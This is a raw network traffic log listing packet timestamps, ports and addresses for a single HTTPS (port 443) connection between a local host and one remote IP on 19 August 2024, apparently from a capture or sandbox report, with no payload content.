Aug 19, 2024 09:28:45.886763096 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.886769056 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.886810064 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.887131929 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.887149096 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.887180090 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.887185097 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.887202024 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.887218952 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.887428045 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.887444973 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.887470961 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.887475967 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.887494087 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.887510061 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.887682915 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.887698889 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.887734890 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.887741089 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.887753963 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.887773037 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.889759064 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.895015001 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.895036936 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.895112991 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.895126104 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.895159006 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.895196915 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.895432949 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.895450115 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.895487070 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.895493031 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.895509958 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.895531893 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.903179884 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.922051907 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.922072887 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.922111988 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.922128916 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.922194958 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.980020046 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.980030060 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.980087042 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.980115891 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.980130911 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.980148077 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.980393887 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.980418921 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.980443001 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.980451107 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.980493069 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.980631113 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.980648041 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.980676889 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.980683088 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.980698109 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.980715036 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.980911970 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.980927944 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.980953932 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.980959892 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.980977058 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.980998039 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.981492996 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.981513977 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.981539965 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.981547117 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.981561899 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.981578112 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.984208107 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.988883018 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.988902092 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.988975048 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.988982916 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.989021063 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.989659071 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.989681005 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.989734888 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.989742994 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.989779949 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.993087053 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.014806032 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.014832020 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.015100956 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.015149117 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.015209913 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.305772066 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.305819035 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.305876017 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.305951118 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.305994034 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.306010008 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.306037903 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.306041002 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.306071043 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.306072950 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.306093931 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.306098938 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.306140900 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.306265116 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.306289911 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.306327105 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.306348085 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.306371927 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.306631088 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.306658983 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.306689978 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.306706905 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.306773901 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.306868076 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.306890965 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.306930065 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.306972980 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.306997061 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.307147980 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.307178020 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.307204008 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.307224035 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.307255030 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.308013916 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.308036089 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.308073997 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.308141947 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.308166981 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.309643984 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.309765100 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.309788942 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.309823990 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.309847116 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.309889078 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.310331106 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.310359955 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.310393095 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.310414076 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.310440063 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.310456038 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.310477018 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.310506105 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.310592890 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.310616970 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.310658932 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.310684919 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.310709000 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.310722113 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.310748100 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.311194897 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.311232090 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.311261892 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.311295986 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.311326027 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.311563969 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.311604977 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.311614037 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.311634064 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.311660051 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.311727047 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.311780930 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.311783075 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.311813116 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.311831951 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.312647104 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.312702894 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.312712908 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.312731028 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.312757969 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.314353943 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.314393044 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.314409018 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.314429045 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.314449072 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.314551115 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.314605951 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.314605951 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.314639091 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.314671993 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.314755917 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.314796925 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.314809084 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.314825058 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.314851999 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.315095901 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.315138102 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.315151930 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.315165997 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.315197945 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.315311909 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.315346956 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.315367937 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.315376997 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.315407991 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.315509081 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.315552950 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.315561056 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.315576077 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.315606117 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.315680027 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.315716028 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.315730095 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.315742016 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.315769911 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.316200018 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.316246986 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.316257000 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.316271067 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.316306114 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.323930025 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.350684881 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.350714922 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.350796938 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.350866079 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.351206064 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.351227045 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.351270914 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.351298094 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.351345062 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.351418018 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.351433039 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.351485014 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.351501942 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.352401018 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.352422953 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.352499962 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.352524042 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.352547884 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.352725029 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.352754116 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.352782965 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.352797031 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.352823973 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.359771013 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.359797001 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.359853983 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.359853983 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.359903097 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.360019922 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.360040903 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.360074043 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.360096931 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.360120058 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.387628078 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.387650013 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.387725115 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.387792110 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.387825012 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.427561045 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.443681002 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.443691969 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.443726063 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.443742990 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.443772078 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.443797112 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.443958998 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.443958998 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.444078922 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.444098949 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.444148064 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.444169044 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.444192886 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.444439888 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.444449902 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.444463968 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.444489002 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.444510937 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.444534063 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.444549084 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.444571972 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.444639921 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.445105076 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.445120096 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.445159912 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.445178032 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.445208073 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.445278883 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.445359945 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.445377111 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.445441008 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.445441008 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.445476055 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.445517063 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.452287912 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.452307940 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.452373028 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.452404022 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.452447891 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.452599049 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.452615976 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.452657938 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.452671051 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.452702999 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.452719927 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.477894068 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.480205059 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.480232954 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.480283022 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.480300903 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.480329037 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.480876923 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.521925926 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.538278103 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.538357019 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.538367033 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.538388968 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.538414001 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.538431883 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.538577080 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.538619041 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.538633108 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.538646936 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.538670063 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.538686991 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.538763046 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.538814068 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.538826942 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.538841009 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.538865089 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.538882971 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.539865017 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.539911032 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.539928913 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.539937019 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.539958954 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.539974928 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.540076017 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.540119886 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.540132046 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.540144920 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.540167093 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.540183067 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.540970087 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.545866013 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.545891047 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:46.545929909 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:46.545936108 CEST	443	49759	185.149.100.242	192.168.2.4
